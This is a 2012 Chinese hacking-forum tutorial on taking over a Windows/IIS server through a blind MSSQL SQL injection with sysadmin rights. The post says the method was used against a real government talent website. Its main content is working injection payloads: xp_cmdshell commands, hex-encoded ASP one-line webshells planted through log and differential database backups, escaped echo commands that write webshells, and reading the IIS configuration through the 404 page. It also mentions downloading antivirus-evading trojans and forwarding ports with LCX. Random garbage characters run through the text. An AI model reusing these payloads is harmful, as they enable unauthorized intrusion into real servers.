找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2120|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
5 \$ d( g& ^+ C+ L8 G" |# Z6 j, n7 d% K- v) B

/ X& j2 U- X+ w0 y                                                             欢迎高手访问指导,欢迎新手朋友交流学习。* q* L; j4 Z# g2 i

0 ~& X. E0 D. U, ~$ ~7 M                                                                 # L1 Q. r, v0 Z, ~( E' l8 |' E
                                                                 ( R" [5 d3 B" s
                                                                  论坛: http://www.90team.net/
& K4 ^1 }3 {; b5 h7 `7 F  d
! E0 G/ d/ Y. K- l' f0 k1 t3 B2 @1 @' c  `! G3 j2 s

5 [5 Y! M/ V. j/ S, S" o: N友情检测国家人才网7 v2 k9 X$ }& n( Y

* x0 \& R3 Q' s. h. y- S) m( \: Y, H+ l( Y1 A% Y4 P( h& o$ ~
内容:MSSQL注入SA权限不显错模式下的入侵
, Y2 a; f( D  h5 q. }+ Z4 ]; s8 P0 f) n( z3 B
: b8 [+ K. M$ x& p* d
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。* F/ O& ~% z% Y. F

; h  Z$ o6 G$ Z* W9 [' C; l我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。' O/ R: J6 f3 \

4 I# r, f* e; N5 g9 h% Q  S  B2 f) F& W: T
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。3 H7 ^/ F9 R- ?6 y# R9 k1 [0 a' p

3 f* e9 t0 v2 G4 O! \( W思路:! d+ W6 e; u6 }- W
5 s/ ?7 _$ D  m
首先:
2 C& K) c" b" Z7 I9 l7 c
; N4 m" N' u# P% O. L' \通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
: C( V  |: ]0 ?& L/ G2 T: D; ?% @" y
: f% P) C  @2 R+ n2 @, L1.日志备份获得Webshell
/ w& x. M, Z  G& ]+ G4 p
* @4 I' E9 ~  y- V2.数据库差异备份获得Webshell" Q- G9 U: g# X! A( b
% ?) d  C+ d* f# y  o( ?! u3 K
4.直接下载免杀远控木马。
% U+ x) k+ b$ I
. n3 e0 y" n! a4 B+ t% v5.直接下载LCX将服务器端口转发出来
- l9 N# o. Z6 Y, N/ v* `
; I% w) l5 d1 M; H! L) v6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
: H! y- I/ f" n8 @8 H9 h# D8 Q8 \1 e/ `5 W
4 B( T: O' |  Q
, O" Y; J% q/ h( B/ i2 Q
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
4 S# e; A. Y, Y/ [
" F. S5 r& K0 N' Z1 P  X/ L我直接演示后面一个方法) R) ^- ^3 C5 E2 N

" ]1 g# G- a8 o7 l
- z, F4 `& P/ R: a, H* Y# x分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ) M3 Q3 y/ F: x( n: x0 O" ^

/ p$ \1 V! M- }1 u+ z! P1 G$ @8 f, Q9 [$ c
4 R' N- t! n5 F, @- W+ w

9 Z0 S) C. d) S5 t◆日志备份:* X3 Y; l5 c6 w: [+ p" X

1 O+ T# q( _8 f/ S2 }- H$ \, x0 R# @( R, d) z" q- X) t
1. 进行初始备份
& p) [' z9 x) c! r8 q. K, N6 L. ?; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
, q/ h& M' Q2 ?
/ f5 U9 S  Y, m2. 插入数据0 L0 x9 d0 A& d* V3 i9 `$ |
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
  ^2 ~* \. |9 \; P( d5 `9 r% P
% n3 L* e0 A  b2 S; G0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' _1 s: D" _) O5 `  
0 d1 {% l1 s/ U6 s3. 备份并获得文件,删除临时表
7 c% p' g" [4 ^5 l;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
1 M3 D% D- p. z4 ?2 {; a5 c' T- u! O3 r9 ?
" f  n$ x% A) w* m- ~2 G* [
; L. ~! q& q. J, z" j" G
◆数据库差异备份
/ u0 I/ [. g8 [9 p/ w7 p$ t% N' j/ \. a9 N9 u$ Y8 T
(1. 进行差异备份准备工作7 p- {. Q$ ]! M2 s( d. Q" v

+ `1 R/ D# Q3 O& O% C% z;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
# N7 N$ g, P& Y4 G0 [9 V/ d
9 F% a" t: j& m9 J0 ~上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码1 T* R' }7 ^' m/ b

9 d6 o2 s7 {/ ]4 X
& [3 N7 o) K% {2 @/ r: p$ t7 y(2. 将数据写入到数据库/ n+ Z) U4 v  r, L  W* Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- 5 S0 y7 I; F! A

; q. }% G% c' l! R' r0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
% X: N. k& o" ^: s! E- z
- j! M5 Q9 S+ a+ G% E3. 备份数据库并清理临时文件
& Q; _- ^# C3 x. ]2 b' r1 x4 N& q7 G2 |1 t7 ~8 e
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--. m. a5 p6 [; r7 B7 v

/ }  y" S) s' U# o' ]6 c; Z0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 8 ~$ K0 K! a# K, n% i7 ~& w1 b

7 u. ]% r! U* a- J7 N6 P% R& x! ?: V- x0 ^! a) F
; q* N2 L6 d0 u& d/ u0 a
用^转义字符来写ASP(一句话木马)文件的方法:   
- t; ?; F! Q9 {3 X# X: X& p9 N5 k, g4 b2 w6 S
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--/ l, i' n- h9 Q2 D4 I- [% Y* O* Q

& n* `. `7 u# o/ |+ i! A. P2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp - u3 a) u5 [& T. v6 T
9 v9 D. ^% h# D: L$ ?) r: B( e2 Z
读取IIS配置信息获取web路径
. w# @( Y/ [0 N- p3 w& |7 D0 @/ K" C% N/ c; X4 H
     
: [& y+ U$ A/ f9 z6 O' l/ [4 e     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
6 @+ ^& n0 \; K3 Z/ g, d+ [, D
% \) N) S# ]- K' b9 R" N- \8 F执行命令
7 s4 q2 @- t5 R& E6 f/ k     3 x% ]+ s% z+ f5 U! a
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
+ Z* q5 f- h7 Z( t8 r& O4 W) g( f- O6 s6 n8 V

9 r- v& P+ @8 r- [8 K( v3 I$ ~+ v
5 D8 s) O% u0 u2 Z+ f+ j' X! y/ U7 u$ Y! N

5 h* X; V1 g) j% @: _7 k) ~" s# k1 j  r9 ^. S
+ K2 c" E3 o8 V# k2 R9 o
9 ~9 I" o4 |# \4 X1 M

# \& A6 U# x0 h! h. a3 D
" Z' j$ H' }( U. S2 {
* e4 i& A3 q1 v9 [4 C$ v' F
$ G5 a9 n$ ]7 _6 c
' [# l& ~) j& J1 J$ }
1 r  O8 h! E: R1 B' N: }) C7 u/ F( k4 j- G

& k5 |% Y3 x* _  `! C/ R' g0 M
3 E6 u# U' l, Y
) Z! o3 ?" m/ Z6 o
) y; m1 }5 z/ K
1 D2 h/ D; b9 |" b2 W3 h* b  x; [, X6 z/ ]% p5 v' ^

5 ?9 H/ n( Q) k! C
- z' q; Y- V# R5 T# h3 ]: ], R5 \$ q( \/ @7 e
% M- F  E* |7 o
. l+ R: N& V( s2 L4 q
& t0 |7 J. h& f0 U9 T. S
( y. y3 ]" n- c
7 W' z& m$ k, I* V4 s/ M  F: l

3 K9 g5 q) O- M- d) z  I; v9 B* D  k8 W- n% G# `

. B, j, @, S' G' `# }( y
' h/ o- I; G6 h" m4 ~3 W  m+ N2 |% f% n( ?+ M! W
% H4 b$ V  {1 b) P
6 S  R) F8 U* g; D! H1 q
/ a1 ^5 c& z6 u$ t# p
- r" |0 A/ U1 h: \
8 L2 H$ {$ o0 u" V- R( {5 h
8 G4 x* P* m, I3 t, L" |; C- m
6 q7 J' J* V. ^* `) c

( @9 J' h8 f' j' N/ n! B" V2 p/ O  n0 r
( j; B( e, B4 n! n' b3 Q

# u1 y  X( ]8 p$ J) K
6 c$ D. o- V6 N# z# r
9 a5 A' u! ~( g6 b# r6 `; w+ P
- k1 R: l- @; ^* C/ X
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表